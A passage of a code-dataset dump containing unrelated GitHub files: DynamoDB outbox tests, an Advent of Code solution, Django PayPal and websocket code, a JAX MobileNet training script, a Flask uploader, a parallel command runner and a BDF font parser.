xx2.ravel()]\nprobs = clf.predict_prob(grid).reshape(xx1.shape)\nplt.contour(xx1, xx2, probs, [0.5], linewidths=1, colors='black')\nplt.show()","repo_name":"shangeth/Logistic_Regression","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19499206845","text":"import datetime\nimport json\nimport uuid\n\nimport pytest\nfrom unit_of_work.dynamodb import DynamoDBSession\n\nfrom tests.events import OrderCreatedEvent, UnknownOrderEvent\nfrom transactional_messaging.dynamodb import DynamoDBOutboxRepository\nfrom transactional_messaging.dynamodb.outbox import MessageNotFoundError, UnknownTopicError\nfrom transactional_messaging.outbox import MessageAlreadyPublishedError\nfrom transactional_messaging.utils.time import utcnow\n\npytestmark = pytest.mark.usefixtures(\"_create_outbox_table\", \"_reset_moto_container_on_teardown\")\n\n\n@pytest.fixture()\ndef repo(session: DynamoDBSession) -> DynamoDBOutboxRepository:\n TOPIC_MAP = {OrderCreatedEvent: \"order--created\"}\n return DynamoDBOutboxRepository(table_name=\"orders-outbox\", session=session, topic_map=TOPIC_MAP)\n\n\n@pytest.mark.asyncio()\nasync def test_publish_message(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n\n await repo.publish([event])\n await session.commit()\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.message_id == event.event_id\n assert published_message.correlation_id == event.correlation_id\n assert published_message.aggregate_id == event.order_id\n assert published_message.topic == \"order--created\"\n assert json.loads(published_message.message) == event.to_dict()\n assert published_message.created_at == event.created_at\n assert published_message.approximate_dispatch_count == 0\n assert published_message.is_dispatched is False\n assert published_message.last_dispatched_at is None\n\n\n@pytest.mark.asyncio()\nasync def test_message_already_published(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.publish([event])\n with pytest.raises(MessageAlreadyPublishedError, match=str(event.event_id)):\n await session.commit()\n\n\n@pytest.mark.asyncio()\nasync def test_unknown_message_topic_raises(repo: DynamoDBOutboxRepository) -> None:\n event = UnknownOrderEvent(order_id=uuid.uuid4()) # Not present in TOPIC_MAP\n\n with pytest.raises(UnknownTopicError, match=\"UnknownOrderEvent\"):\n await repo.publish([event])\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched_not_existing_message_raises(repo: DynamoDBOutboxRepository) -> None:\n message_id = uuid.uuid4()\n\n with pytest.raises(MessageNotFoundError, match=str(message_id)):\n await repo.mark_as_dispatched(message_id=message_id)\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event.event_id)\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.approximate_dispatch_count == 1\n assert published_message.is_dispatched is True\n assert published_message.last_dispatched_at\n assert datetime.timedelta(seconds=1) > utcnow() - published_message.last_dispatched_at\n\n\n@pytest.mark.asyncio()\nasync def test_mark_as_dispatched_twice(repo: DynamoDBOutboxRepository, session: DynamoDBSession) -> None:\n event = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event.event_id)\n await repo.mark_as_dispatched(message_id=event.event_id)\n\n published_message = await repo.get(message_id=event.event_id)\n assert published_message\n assert published_message.approximate_dispatch_count == 2\n\n\n@pytest.mark.asyncio()\nasync def test_get_not_dispatched_messages__oldest_message_first(\n repo: DynamoDBOutboxRepository, session: DynamoDBSession\n) -> None:\n event_1 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2023, 1, 1))\n event_2 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2021, 1, 1))\n event_3 = OrderCreatedEvent(order_id=uuid.uuid4(), created_at=datetime.datetime(2022, 1, 1))\n event_4 = OrderCreatedEvent(order_id=uuid.uuid4()) # Dispatched\n\n await repo.publish([event_1, event_2, event_3, event_4])\n await session.commit()\n await repo.mark_as_dispatched(message_id=event_4.event_id)\n await session.commit()\n\n not_dispatched_messages = await repo.get_not_dispatched_messages()\n assert len(not_dispatched_messages) == 3\n assert not_dispatched_messages[0] == await repo.get(message_id=event_2.event_id)\n assert not_dispatched_messages[1] == await repo.get(message_id=event_3.event_id)\n assert not_dispatched_messages[2] == await repo.get(message_id=event_1.event_id)\n\n\n@pytest.mark.asyncio()\nasync def test_dispatched_message_removed_from_not_dispatched_messages_collection(\n repo: DynamoDBOutboxRepository, session: DynamoDBSession\n) -> None:\n event_1 = OrderCreatedEvent(order_id=uuid.uuid4())\n event_2 = OrderCreatedEvent(order_id=uuid.uuid4())\n await repo.publish([event_1, event_2])\n await session.commit()\n\n await repo.mark_as_dispatched(message_id=event_1.event_id)\n\n not_dispatched_messages = await repo.get_not_dispatched_messages()\n assert len(not_dispatched_messages) == 1\n assert not_dispatched_messages[0] == await repo.get(message_id=event_2.event_id)\n","repo_name":"filipsnastins/transactional-messaging-patterns-with-aws-dynamodb-streams-sns-sqs-lambda","sub_path":"library-transactional-messaging/tests/test_dynamodb_outbox_repository.py","file_name":"test_dynamodb_outbox_repository.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"31301331674","text":"\"\"\"\n--- Day 1: No Time for a Taxicab ---\n\nSanta's sleigh uses a very high-precision clock to guide its movements, and the clock's oscillator is regulated by stars. Unfortunately, the stars have been stolen... by the Easter Bunny. To save Christmas, Santa needs you to retrieve all fifty stars by December 25th.\n\nCollect stars by solving puzzles. Two puzzles will be made available on each day in the advent calendar; the second puzzle is unlocked when you complete the first. Each puzzle grants one star. Good luck!\n\nYou're airdropped near Easter Bunny Headquarters in a city somewhere. \"Near\", unfortunately, is as close as you can get - the instructions on the Easter Bunny Recruiting Document the Elves intercepted start here, and nobody had time to work them out further.\n\nThe Document indicates that you should start at the given coordinates (where you just landed) and face North. Then, follow the provided sequence: either turn left (L) or right (R) 90 degrees, then walk forward the given number of blocks, ending at a new intersection.\n\nThere's no time to follow such ridiculous instructions on foot, though, so you take a moment and work out the destination. Given that you can only walk on the street grid of the city, how far is the shortest path to the destination?\n\nFor example:\n\nFollowing R2, L3 leaves you 2 blocks East and 3 blocks North, or 5 blocks away.\nR2, R2, R2 leaves you 2 blocks due South of your starting position, which is 2 blocks away.\nR5, L5, R5, R3 leaves you 12 blocks away.\nHow many blocks away is Easter Bunny HQ?\n\n--- Part Two ---\n\nThen, you notice the instructions continue on the back of the Recruiting Document. Easter Bunny HQ is actually at the first location you visit twice.\n\nFor example, if your instructions are R8, R4, R4, R8, the first location you visit twice is 4 blocks away, due East.\n\nHow many blocks away is the first location you visit twice?\n\nYour puzzle answer was 182.\n\n\"\"\"\n\n\n\ndirections = \"R3, L5, R1, R2, L5, R2, R3, L2, L5, R5, L4, L3, R5, L1, R3, R4, R1, L3, R3, L2, L5, L2, R4, R5, R5, L4, L3, L3, R4, R4, R5, L5, L3, R2, R2, L3, L4, L5, R1, R3, L3, R2, L3, R5, L194, L2, L5, R2, R1, R1, L1, L5, L4, R4, R2, R2, L4, L1, R2, R53, R3, L5, R72, R2, L5, R3, L4, R187, L4, L5, L2, R1, R3, R5, L4, L4, R2, R5, L5, L4, L3, R5, L2, R1, R1, R4, L1, R2, L3, R5, L4, R2, L3, R1, L4, R4, L1, L2, R3, L1, L1, R4, R3, L4, R2, R5, L2, L3, L3, L1, R3, R5, R2, R3, R1, R2, L1, L4, L5, L2, R4, R5, L2, R4, R4, L3, R2, R1, L4, R3, L3, L4, L3, L1, R3, L2, R2, L4, L4, L5, R3, R5, R3, L2, R5, L2, L1, L5, L1, R2, R4, L5, R2, L4, L5, L4, L5, L2, L5, L4, R5, R3, R2, R2, L3, R3, L2, L5\"\n\n\ndef get_direction(direction, steps, facing):\n if direction == 'R':\n # turn right\n facing += 1\n else:\n # turn left\n facing -= 1\n\n # make sure facing cardinal directions loops back\n # Cardinal directions = ['N', 'R', 'D', 'L']\n if facing > 3: facing = 0\n if facing < 0: facing = 3\n\n x, y = (0, 0)\n\n if facing == 0:\n x, y = 0, steps\n elif facing == 1:\n x, y = steps, 0\n elif facing == 2:\n x, y = 0, -steps\n else:\n x, y = -steps, 0\n\n return (x, y, facing)\n\ndef blocks_away(directions):\n start = (0, 0)\n facing = 0\n\n for coord in directions.split(','):\n coord = coord.strip()\n direction = coord[:1]\n steps = coord[1:]\n x, y, facing = get_direction(direction, int(steps), facing)\n start = (start[0] + x, start[1] + y)\n\n return abs(start[0]) + abs(start[1])\n\ndef blocks_away_first(directions):\n start = (0, 0)\n facing = 0\n routes = set()\n for coord in directions.split(','):\n coord = coord.strip()\n direction = coord[:1]\n steps = coord[1:]\n x, y, facing = get_direction(direction, int(steps), facing)\n\n # Generate path walked from prev position to new position\n x_step = 1 if x >= 0 else -1\n y_step = 1 if y >= 0 else -1\n if x != 0:\n path = [(x_, start[1]) for x_ in range(start[0], start[0] + x, x_step)]\n else:\n path = [(start[0], y_) for y_ in range(start[1], start[1] + y, y_step)]\n \n # Add path to our routes set, if encountered, then we have our twice visited location\n for p in path:\n if p in routes:\n return abs(p[0]) + abs(p[1])\n else:\n routes.add(p)\n\n start = (start[0] + x, start[1] + y)\n\n# Part 1 Answer\nprint (blocks_away(directions))\n# Part 2 Answer\nprint (blocks_away_first(directions))\n","repo_name":"alex-red/advent_of_code_2016","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29849100204","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom paypal.standard.forms import PayPalPaymentsForm\nfrom newapp.models import UserProfileInfo\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'payment/done.html')\n\n\n@csrf_exempt\ndef payment_canceled(request):\n return render(request, 'payment/canceled.html')\n\n\n\ndef payment_process(request):\n # order_id = request.session.get('order_id')\n # print(order_id)\n # order = get_object_or_404(UserProfileInfo, id=order_id)\n # #userprofile = UserProfileInfo.objects.get(user=request.user)\n # print(order)\n # print(order.id)\n # amount = order.amount\n # print(amount)\n host = request.get_host()\n # print(host)\n\n paypal_dict = {\n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '100000',\n 'item_name': 'test',\n 'invoice': 'test_payment',\n 'currency_code': 'USD',\n 'notify_url': 'http://{}{}'.format(host, reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host, reverse('payment:done')),\n 'cancel_return': 'http://{}{}'.format(host, reverse('payment:canceled')),\n }\n form = PayPalPaymentsForm(initial=paypal_dict)\n context= {'form':form}\n return render(request, 'payment/process.html', context)\n","repo_name":"javacode56/jai-mahaveer-foundation","sub_path":"jaimahavir/newproj/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42626664936","text":"import concurrent.futures\nimport re\n\nimport clearbit\nfrom channels.generic.websocket import WebsocketConsumer\nfrom django.conf import settings\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework_jwt.serializers import VerifyJSONWebTokenSerializer, jwt_get_username_from_payload\n\nfrom socialuser.models import User\n\n\nclass UserInfoConsumer(WebsocketConsumer):\n consumers = {}\n\n def connect(self):\n self.user = None\n self.accept()\n\n def receive(self, *, text_data):\n m = re.match(r'^/auth (.*)$', text_data)\n if not m:\n self.send(text_data=\"error: syntax\")\n return\n\n token = m[1]\n try:\n # TODO: Report bug of djangorestframework-jwt==1.11.0 - it tries to User.objects.get_by_natural_key(username) for wrong user model.\n # user_info = VerifyJSONWebTokenSerializer().validate({'token': token})\n payload = VerifyJSONWebTokenSerializer()._check_payload(token=token)\n username = jwt_get_username_from_payload(payload)\n self.remove_self() # possibly switch to different socialuser\n self.user = User.objects.get(username=username)\n except (ValidationError, User.DoesNotExist) as e:\n self.send(text_data=\"error: cannot authenticate\" + str(e))\n else:\n if not self.user.pk in UserInfoConsumer.consumers:\n UserInfoConsumer.consumers[self.user.pk] = set()\n UserInfoConsumer.consumers[self.user.pk].add(self)\n self.send(text_data=\"ok: user_id={}\".format(self.user.pk))\n\n def disconnect(self, message):\n self.remove_self()\n if self.user and not UserInfoConsumer.consumers[self.user.pk]:\n del UserInfoConsumer.consumers[self.user.pk]\n\n def remove_self(self):\n if self.user:\n UserInfoConsumer.consumers[self.user.pk].remove(self)\n\n @staticmethod\n def notify_user_info_received(user_pk, success):\n if not user_pk in UserInfoConsumer.consumers:\n return\n for consumer in UserInfoConsumer.consumers[user_pk]:\n consumer.send(\"notice: socialuser data received\" if success else \"error: cannot receive socialuser data\")\n\n\n_executor = concurrent.futures.ThreadPoolExecutor(max_workers=settings.MAX_RETRIEVE_DATA_EXECUTORS)\n\ndef fill_user_data_automatically(user):\n # Thread(target=do_fill_user_data_automatically, args=(user,)).start()\n _executor.submit(do_fill_user_data_automatically, user)\n\n\ndef do_fill_user_data_automatically(user):\n if settings.SKIP_EXTERNAL_CALLS:\n return\n\n person = clearbit.Person.find(email=user.email, stream=True)\n # Don't handle errors in details, because error messages may probably contain private information.\n if person == None:\n UserInfoConsumer.notify_user_info_received(user.pk, success=False)\n return\n\n # My interpretation of \"additional information\" in the tech specification:\n if not user.first_name:\n user.first_name = person['name']['givenName'] or \"\"\n if not user.last_name:\n user.last_name = person['name']['familyName'] or \"\"\n # ignore person['name']['fullName']\n if not user.location:\n user.location = person['location'] or \"\"\n if not user.city:\n user.city = person['geo']['city'] or \"\"\n if not user.state:\n user.state = person['geo']['state'] or \"\"\n if not user.country:\n user.country = person['geo']['country'] or \"\"\n if user.lat is None:\n user.lat = person['geo']['lat'] or None\n if user.lng is None:\n user.lng = person['geo']['lng'] or None\n if not user.bio:\n user.bio = person['bio'] or \"\"\n # Handle exceptions be sure for the case if ClearBit's concept of URL is not the same as ours:\n if not user.site:\n try:\n user.site = person['site'] or \"\"\n except ValidationError:\n pass\n if not user.avatar:\n try:\n user.avatar = person['avatar'] or \"\"\n except ValidationError:\n pass\n\n user.save()\n UserInfoConsumer.notify_user_info_received(user.pk, success=True)\n","repo_name":"vporton/avatrade-job-test","sub_path":"socialuser/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29363843036","text":"import os\n# Note: To maintain the default precision as 32-bit and not switch to 64-bit, set the following flag prior to any\n# imports of JAX. This is necessary as the jax_enable_x64 flag is later set to True inside the Lanczos algorithm.\n# See: https://github.com/google/jax/issues/8178\nos.environ['JAX_DEFAULT_DTYPE_BITS'] = '32'\n\nimport csv\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\nimport tensorflow as tf\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport optax\nimport jax\nimport jax.numpy as jnp\nfrom jax import random, value_and_grad, jit\nfrom jax.lib import xla_bridge\nimport haiku as hk\nfrom haiku.nets import MobileNetV1\n\nfrom experiments.dnn.dnn_test_utils import start_test, get_config, write_config_to_file, get_optimizer\n\nprint(jax.local_devices())\nprint(xla_bridge.get_backend().platform)\ntf.config.experimental.set_visible_devices([], \"GPU\")\n\n\nclass AudiosetDataset(data.Dataset):\n\n def __init__(self, annotations_file_csv='./audioset_dataset/index.csv', img_dir='./audioset_dataset/train_jpg',\n transform=transforms.Compose([transforms.ToTensor()])):\n super().__init__()\n df = pd.read_csv(annotations_file_csv, converters={\n \"labels_as_indices\": lambda x: np.array(x.strip(\"[]\").replace(\"'\", \"\").split(\", \")).astype(int)})\n self.df_data = df.values\n self.data_dir = img_dir\n self.transform = transform\n self.num_classes = 527\n\n def __len__(self):\n return len(self.df_data)\n\n def __getitem__(self, index):\n img_name, label = self.df_data[index]\n img_path = os.path.join(self.data_dir, img_name)\n image = plt.imread(img_path)\n if self.transform is not None:\n image = self.transform(np.array(image))\n target = torch.zeros(self.num_classes)\n target[label] = 1.\n return image, target\n\n\ndef train_mobilenet(optimizer_name):\n\n def sigmoid_cross_entropy(logits, labels):\n \"\"\" Computes sigmoid cross entropy given logits and multiple class labels. \"\"\"\n logits = logits.astype(jnp.float32)\n log_p = jax.nn.log_sigmoid(logits)\n log_not_p = jax.nn.log_sigmoid(-logits)\n loss = -labels * log_p - (1. - labels) * log_not_p\n return jnp.asarray(loss)\n\n @jit\n def loss_fn(params, batch_data, state):\n \"\"\" Implements cross-entropy loss function.\n\n Args:\n params: Parameters of the network\n batch_data: A batch of data (images and labels)\n Returns:\n Loss calculated for the current batch\n \"\"\"\n inputs, targets = batch_data\n preds, state = model.apply(params, state, None, inputs, is_training=True)\n return sigmoid_cross_entropy(logits=preds, labels=targets).mean(), state\n\n def calculate_accuracy(params, batch_data, state):\n \"\"\" Implements accuracy metric.\n\n Args:\n params: Parameters of the network\n batch_data: A batch of data (images and labels)\n Returns:\n Accuracy for the current batch\n \"\"\"\n inputs, targets = batch_data\n preds, _ = model.apply(params, state, None, inputs, is_training=False)\n predicted_class = jnp.argmax(preds, axis=1)\n indexes = (jnp.array(jnp.arange(0, targets.shape[0])), predicted_class)\n target_class = targets[indexes]\n return jnp.mean(target_class)\n\n @jit\n def inference(params, batch_data, state):\n \"\"\" Implements train step.\n\n Args:\n opt_state: Current state of the optimizer\n batch_data: A batch of data (images and labels)\n Returns:\n Batch loss, batch accuracy\n \"\"\"\n batch_loss, _ = loss_fn(params, batch_data, state)\n batch_accuracy = calculate_accuracy(params, batch_data, state)\n return batch_loss, batch_accuracy\n\n @jit\n def train_step(opt_state, params, batch_data, state):\n \"\"\" Implements train step.\n\n Args:\n step: Integer representing the step index\n opt_state: Current state of the optimizer\n batch_data: A batch of data (images and labels)\n Returns:\n Batch loss, batch accuracy, updated optimizer state\n \"\"\"\n (batch_loss, state), batch_gradients = value_and_grad(loss_fn, has_aux=True)(params, batch_data, state)\n batch_accuracy = calculate_accuracy(params, batch_data, state)\n\n deltas, opt_state = optimizer.update(batch_gradients, opt_state, params)\n params = optax.apply_updates(params, deltas)\n\n return batch_loss, batch_accuracy, opt_state, params, state\n\n np.random.seed(1234)\n\n batch_size = 256\n\n trainset = AudiosetDataset(annotations_file_csv='./audioset_dataset/index_train.csv', img_dir='./audioset_dataset/train_jpg')\n train_ds = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4, drop_last=True)\n\n validset = AudiosetDataset(annotations_file_csv='./audioset_dataset/index_valid.csv', img_dir='./audioset_dataset/valid_jpg')\n val_ds = torch.utils.data.DataLoader(validset, batch_size=batch_size, shuffle=False, num_workers=4, drop_last=True)\n\n num_train_batches = len(train_ds)\n num_valid_batches = len(val_ds)\n\n print(\"num_train_batches:\", num_train_batches, \"num_valid_batches:\", num_valid_batches)\n\n learning_rate = 1e-1 if 'momentum' in optimizer_name else 1e-3\n conf = get_config(optimizer=optimizer_name, approx_k=10, batch_size=batch_size, learning_rate=learning_rate,\n num_iterations_between_ese=800, approx_l=0, alpha=0.01, num_warmup_iterations=num_train_batches)\n test_folder = start_test(conf[\"optimizer\"], test_folder='test_results_mobilenet_audioset')\n write_config_to_file(test_folder, conf)\n\n def _model(images, is_training):\n net = MobileNetV1(num_classes=527)\n return net(images, is_training)\n\n model = hk.transform_with_state(_model)\n\n # We have defined our model. We need to initialize the params based on the input shape.\n batch = next(iter(train_ds))\n batch = (jnp.array(batch[0], jnp.float32), jnp.array(batch[1], jnp.int32))\n x = jnp.asarray(batch[0][0], dtype=jnp.float32)\n x = jnp.expand_dims(x, axis=0)\n net_params, state = model.init(random.PRNGKey(111), x, is_training=True)\n\n loss_f = lambda params, batch: loss_fn(params, batch, state)[0]\n optimizer = get_optimizer(conf, loss_f, batch, b_call_ese_internally=False)\n opt_state = optimizer.init(net_params)\n\n ############################### Training ###############################\n\n train_stats_file = test_folder + \"/train_stats.csv\"\n with open(train_stats_file, 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"epoch\", \"train_loss\", \"train_acc\", \"val_loss\", \"val_acc\", \"latency\", \"wall_time\"])\n\n start_time = 1e10\n for i in range(conf[\"num_epochs\"]):\n if i == 1:\n start_time = timer()\n\n # Lists to store loss and accuracy for each batch\n train_batch_loss, train_batch_acc = [], []\n valid_batch_loss, valid_batch_acc = [], []\n iteration_latency = []\n\n print(f\"Epoch: {i:<3}\", end=\" \")\n epoch_start = timer()\n\n # Training\n for step, batch_data in enumerate(train_ds):\n bd = (jnp.array(batch_data[0], jnp.float32), jnp.array(batch_data[1], jnp.int32))\n iteration_start = timer()\n if \"fosi\" in optimizer_name and max(1, (i * num_train_batches + step) + 1 - conf[\"num_warmup_iterations\"]) % conf[\"num_iterations_between_ese\"] == 0:\n opt_state = optimizer.update_ese(net_params, opt_state)\n loss_value, acc, opt_state, net_params, state = train_step(opt_state, net_params, bd, state)\n iteration_end = timer()\n\n train_batch_loss.append(loss_value)\n train_batch_acc.append(acc)\n iteration_latency.append(iteration_end - iteration_start)\n\n epoch_end = timer()\n\n # Evaluation on validation data every 5 epochs\n if i % 5 == 0:\n for batch_data in val_ds:\n bd = (jnp.array(batch_data[0], jnp.float32), jnp.array(batch_data[1], jnp.int32))\n loss_value, acc = inference(net_params, bd, state)\n valid_batch_loss.append(loss_value)\n valid_batch_acc.append(acc)\n\n # Loss for the current epoch\n epoch_valid_loss = np.mean(valid_batch_loss)\n # Accuracy for the current epoch\n epoch_valid_acc = np.mean(valid_batch_acc)\n\n # Loss for the current epoch\n epoch_train_loss = np.mean(train_batch_loss)\n\n # Accuracy for the current epoch\n epoch_train_acc = np.mean(train_batch_acc)\n\n print(f\"loss: {epoch_train_loss:.3f} acc: {epoch_train_acc:.3f} valid_loss: {epoch_valid_loss:.3f} valid_acc: {epoch_valid_acc:.3f} latency: {epoch_end - epoch_start}\")\n with open(train_stats_file, 'a') as f:\n writer = csv.writer(f)\n writer.writerow(\n [i, epoch_train_loss, epoch_train_acc, epoch_valid_loss, epoch_valid_acc, epoch_end - epoch_start,\n np.maximum(0, timer() - start_time)])\n\n\nif __name__ == \"__main__\":\n for optimizer_name in ['fosi_adam', 'fosi_momentum', 'adam', 'momentum']:\n train_mobilenet(optimizer_name)\n","repo_name":"hsivan/fosi","sub_path":"experiments/dnn/mobilenet_audioset.py","file_name":"mobilenet_audioset.py","file_ext":"py","file_size_in_byte":9437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"15075246378","text":"import logging\n\nfrom flask import Blueprint, render_template, request\n\n\nfrom loader.utils import get_new_post, load_json_data\n\nfrom config import POST_PATH, UPLOAD_FOLDER\n\nfrom my_logger import logger\n\n\nloader_blueprint = Blueprint('loader_blueprint', __name__, template_folder='templates', static_folder='static')\n\n\n# Страница с формой для добавления нового поста\n@loader_blueprint.route(\"/post_form/\", methods=[\"POST\", \"GET\"])\ndef page_post_form():\n\n return render_template('post_form.html')\n\n\n\n@loader_blueprint.route(\"/post_uploaded/\", methods=[\"POST\", \"GET\"])\ndef page_post_uploaded():\n try:\n post_content = request.form['content'] # Получаем текст из формы\n picture = request.files.get('picture') # Получаем изображение\n filename = picture.filename # Получаем имя файла(изображения)\n picture_path = f\"{UPLOAD_FOLDER}/{filename}\" # формируем путь для сохранения изображения\n picture.save(picture_path) # Сохраняем изображение\n get_new_post(POST_PATH, picture_path, post_content, load_json_data(POST_PATH)) # Формируем новый пост\n logger.info('Загружен новый пост')\n return render_template('post_uploaded.html', post_content=post_content, picture_path=picture_path)\n except:\n logger.error('Ошибка загрузки данных поста')\n return render_template('error.html')\n\n","repo_name":"Kosheyking/homework12","sub_path":"loader/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7142624767","text":"import pygame\nfrom globalValues import *\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, width, height, posX, posY, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.rect = self.image.get_rect()\n self.rect.center = [posX, posY]\n","repo_name":"Aleksiiej/pacman_linux","sub_path":"map/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9679706338","text":"from multiprocessing import Pool\nimport subprocess\nimport argparse\nimport shlex\nimport sys\n\nclass Engine(object):\n \n # 并发数量\n def __init__(self, cmds, pnum = 5):\n self.cmds = cmds\n self.pnum = pnum\n\n def task(self, cmd):\n p = subprocess.Popen(shlex.split(cmd),close_fds=True, bufsize=-1)\n p.communicate()\n\n def start(self):\n pool = Pool(self.pnum)\n for cmd in self.cmds:\n pool.apply_async(self.task, (cmd,))\n pool.close()\n pool.join()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-c',\"--cmds\", help='输入执行的命令')\n parser.add_argument('-p',\"--process\", type=int, help=\"进程数量\", default=5)\n args = parser.parse_args()\n cmds = args.cmds.split(\"\\n\")\n pnum = args.process\n engine = Engine(cmds, pnum)\n engine.start()\n ","repo_name":"linpengstc/pentest","sub_path":"core/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28265954506","text":"from PIL import Image, ImageDraw, ImageFont\nimport numpy as np\n# get an image\n\n# make a blank image for the text, initialized to transparent text color\nfrom PIL import FontFile\n\n# --------------------------------------------------------------------\n# parse X Bitmap Distribution Format (BDF)\n# --------------------------------------------------------------------\n\nbdf_slant = {\n \"R\": \"Roman\",\n \"I\": \"Italic\",\n \"O\": \"Oblique\",\n \"RI\": \"Reverse Italic\",\n \"RO\": \"Reverse Oblique\",\n \"OT\": \"Other\",\n}\n\nbdf_spacing = {\"P\": \"Proportional\", \"M\": \"Monospaced\", \"C\": \"Cell\"}\n\n\ndef bdf_char(f):\n # skip to STARTCHAR\n while True:\n s = f.readline()\n if not s:\n return None\n if s[:9] == b\"STARTCHAR\":\n break\n id = s[9:].strip().decode(\"ascii\")\n\n # load symbol properties\n props = {}\n while True:\n s = f.readline()\n if not s or s[:6] == b\"BITMAP\":\n break\n i = s.find(b\" \")\n props[s[:i].decode(\"ascii\")] = s[i + 1 : -1].decode(\"ascii\")\n\n # load bitmap\n bitmap = []\n while True:\n s = f.readline()\n if not s or s[:7] == b\"ENDCHAR\":\n break\n bitmap.append(s[:-1])\n bitmap = b\"\".join(bitmap)\n\n [x, y, l, d] = [int(p) for p in props[\"BBX\"].split()]\n [dx, dy] = [int(p) for p in props[\"DWIDTH\"].split()]\n\n bbox = (dx, dy), (l, -d - y, x + l, -d), (0, 0, x, y)\n\n try:\n im = Image.frombytes(\"1\", (x, y), bitmap, \"hex\", \"1\")\n except ValueError:\n # deal with zero-width characters\n im = Image.new(\"1\", (x, y))\n\n return id, int(props[\"ENCODING\"]), bbox, im\n\n\n##\n# Font file plugin for the X11 BDF format.\n\nIMG_EPS = 1e-6\n\ndef normalize_0_1(img:np.ndarray):\n assert img.ndim == 2\n m = img.max()\n if m < IMG_EPS:\n return np.ones_like(img, dtype = np.float) * IMG_EPS\n return img / m\n\nclass BdfFontFile(FontFile.FontFile):\n def __init__(self, fp):\n\n FontFile.FontFile.__init__(self)\n\n s = fp.readline()\n if s[:13] != b\"STARTFONT 2.1\":\n raise SyntaxError(\"not a valid BDF file\")\n\n props = {}\n comments = []\n\n while True:\n s = fp.readline()\n if not s or s[:13] == b\"ENDPROPERTIES\":\n break\n i = s.find(b\" \")\n props[s[:i].decode(\"ascii\")] = s[i + 1 : -1].decode(\"ascii\")\n if s[:i] in [b\"COMMENT\", b\"COPYRIGHT\"]:\n if s.find(b\"LogicalFontDescription\") < 0:\n comments.append(s[i + 1 : -1].decode(\"ascii\"))\n\n while True:\n c = bdf_char(fp)\n if not c:\n break\n id, ch, (xy, dst, src), im = c\n if 0 <= ch < len(self.glyph):\n self.glyph[ch] = id, xy, dst, src, im\n\n\nclass FontBase:\n\n # while character\n def genChar(self, c:str):\n raise Exception(\"should be implemented as return np.array, PIL.Image\")\n\n def genAllChar(self):\n self.chnp = []\n self.chimg = []\n for i in self.decoding_table:\n a, b = self.genChar(i)\n self.chnp += [a]\n self.chimg += [b]\n\n def drawOut(self,data:np.ndarray, img0 = None):\n \"\"\"\n\n :param data: (H,W, 7 ) ascii, fore rgb, back rgb\n :param img0: (H*hh, W*ww, 3 ) original image before parse, if this is set return diff value\n :return: (H*hh, W*ww, 3 ), diff value (H, W)\n \"\"\"\n H,W,_ = data.shape\n h = H * self.h\n w = W * self.w\n d2 = np.zeros( (h, w, 3) )\n diffImg = np.zeros( shape = (H,W) )\n for hi in range(H):\n for wi in range(W):\n ascii_idx,r1,g1,b1,r2,g2,b2 = data[hi,wi].tolist()\n fcolor = np.array([r1,g1,b1]).reshape((1,1,3))\n bcolor = np.array([r2,g2,b2]).reshape((1,1,3))\n stencil = self.chnp[ascii_idx].reshape( (self.h, 